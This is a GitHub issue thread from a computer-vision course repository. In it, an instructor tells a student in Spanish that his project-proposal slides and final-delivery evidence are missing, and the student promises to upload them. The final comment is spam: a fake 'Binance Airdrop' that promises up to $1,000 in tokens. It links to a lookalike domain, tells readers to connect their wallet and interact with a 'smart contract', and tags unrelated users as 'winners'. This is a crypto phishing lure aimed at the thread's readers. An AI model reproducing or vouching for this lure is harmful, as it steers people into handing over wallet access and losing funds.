### ISSUE TITLE
No veo las diapositivas de planteamiento de proyecto

### ISSUE THREAD

**Issue by satuelisa** [otniel/computer-vision#1]
Estás arriesgando un NP...

**Comment by otniel** [comment]
Sorry, las iba a subir junto con la tarea de circulos, en seguida las subo.

**Comment by satuelisa** [comment]
Siguen faltando todas las evidencias de la fase de entrega del proyecto final.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @txy13654, @maraoz, @betta-cyber, @romeucampos, @ketan099, @kylecui2016, @scientistnik
